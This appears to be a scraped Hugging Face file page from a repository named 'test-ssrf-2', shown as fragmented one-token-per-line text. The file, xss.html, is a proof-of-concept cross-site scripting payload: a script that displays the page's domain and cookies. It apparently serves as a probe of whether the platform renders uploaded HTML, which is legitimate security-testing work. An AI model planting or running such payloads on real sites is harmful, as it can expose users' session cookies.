Hugging Face
Models
Datasets
Spaces
Buckets
new
Docs
Enterprise
Pricing
Log In
Sign Up
osamaeid
/
test-ssrf-2
like
1
Text Generation
Safetensors
Carbon Emissions
License:
mit
Model card
Files
Files and versions
xet
Community
30
main
test-ssrf-2
/
xss.html
osamaeid
test HTML XSS
43b59fc
verified
6 days ago
raw
Copy download link
history
blame
contribute
delete
Safe
102 Bytes
<
html
>
<
body
>
<
script
>
alert
(
document
.
domain
+
"|"
+
document
.
cookie
)
</
script
>
<
h1
>
XSS Test
</
h1
>
</
body
>
</
html
>